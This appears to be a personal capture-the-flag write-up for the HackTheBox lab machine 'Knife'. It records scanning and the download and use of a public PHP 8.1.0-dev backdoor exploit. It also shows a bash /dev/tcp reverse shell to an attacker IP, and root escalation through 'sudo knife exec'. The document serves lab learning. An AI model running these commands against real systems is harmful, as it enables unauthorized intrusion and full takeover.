# Meta Data

IP: 10.129.190.120
Date accessed: 08/18/2021

# Scanning

```
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title:  Emergent Medical Idea


```

- Navigate to the website 

- View page source
```
"https://cpwebassets.codepen.io/assets/common/stopExecutionOnTimeout-157cd5b220a5c80d4ff8e0e70ac069bffd87a61252088146915e8726e5d9f147.js

```
- Inspect Element > Network > GET request
```
X-Powered-By
	PHP/8.1.0-dev

```

# Exploits

Recent exploit
- ``wget https://packetstormsecurity.com/files/download/162749/php_8.1.0-dev.py.txt -O exploit.py``


```
python3 exploit.py -u http://10.129.190.120/ -c "id"
[+] Results:
uid=1000(james) gid=1000(james) groups=1000(james)


```
- set up netcat 
```
python3 exploit.py -u http://10.129.190.120/ -c "/bin/bash -c '/bin/bash -i >& /dev/tcp/10.10.14.94/4444 0>&1'"


```
``root@kali-virtualbox:~/GitLab/Offensive-Security/HackTheBox/Knife# nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.94] from (UNKNOWN) [10.129.190.120] 33542
bash: cannot set terminal process group (875): Inappropriate ioctl for device
bash: no job control in this shell
james@knife:/$ ``

```
james@knife:/$ sudo knife exec -E "system('/bin/sh -i')"
sudo knife exec -E "system('/bin/sh -i')"
/bin/sh: 0: can't access tty; job control turned off
# pwd
/
# whoami
root
# python3 -d 'import pty; pty.spawn("/bin/bash")'
python3: can't open file 'import pty; pty.spawn("/bin/bash")': [Errno 2] No such file or directory
# pwd
/
# cd root	
# pwd
/root
# ls
delete.sh
root.txt
snap
# cat root.txt
2fc175c72e72f7a880fdb29a79051267
# 

```